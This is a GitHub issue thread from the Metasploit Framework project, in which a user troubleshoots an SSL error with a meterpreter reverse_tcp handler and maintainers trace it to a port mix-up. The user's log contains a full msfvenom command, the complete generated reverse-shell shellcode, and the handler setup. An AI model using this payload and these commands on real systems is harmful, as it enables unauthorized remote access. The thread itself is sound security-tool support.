search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.72k stars 13.89k forks source link

OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol #8312

Closed zoo143 closed 7 years ago

zoo143 commented 7 years ago

Steps to reproduce

How'd you do it?

  1. payload windows/meterpreter/reverse_tcp
  2. exploit

Expected behavior

it's to obtain meterpreter session. Meterpreter prompt should show up as below.

[] Sending stage (884270 bytes) to 192.168.56.1 [] Meterpreter session 1 opened (192.168.56.4:4444 -> 192.168.56.1:56007) at 2015-07-13 00:04:26 +0900

meterpreter >

Current behavior

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > exploit

[] Started reverse TCP handler on 192.168.56.4:4444 [] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.56.119 [-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

OS

Linux kali32 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

timwr commented 7 years ago

How are you generating the payload? msfvenom? Can you post the logs?

zoo143 commented 7 years ago

Thanks. I used msfvenom, and below is the console log.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=4444 -f python No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of python file: 1602 bytes buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" buf += "\xff\xd5\x6a\x05\x68\xc0\xa8\x38\x04\x68\x02\x00\x11" buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec" buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02" buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a" buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40" buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57" buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9" buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0" buf += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5" root@kali32:~# root@kali32:~# msfconsole

msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.56.4 LHOST => 192.168.56.4 msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.56.4 yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Wildcard Target

msf exploit(handler) > exploit

[] Started reverse TCP handler on 192.168.56.4:4444 [] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.56.119 [-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol

busterb commented 7 years ago

how did you invoke your payload with format 'python' on the target?

busterb commented 7 years ago

I noticed your expected behavior section is from 2015. Are you following some sort of tutorial or blog post about exploiting python programs?

zoo143 commented 7 years ago

yes, I follow this blog http://inaz2.hatenablog.com/entry/2015/07/13/011841

thanks

busterb commented 7 years ago

I followed the blog steps and it worked as expected. I'm suspecting you pointed the Python shellcode injector at the metasploit listener, instead of the vulnerable service. That would create the error you see here. The blog is confusing because the author uses port 4444 for both the vulnerable service and the listener. Try changing the ports and you will see what I mean.

Good luck.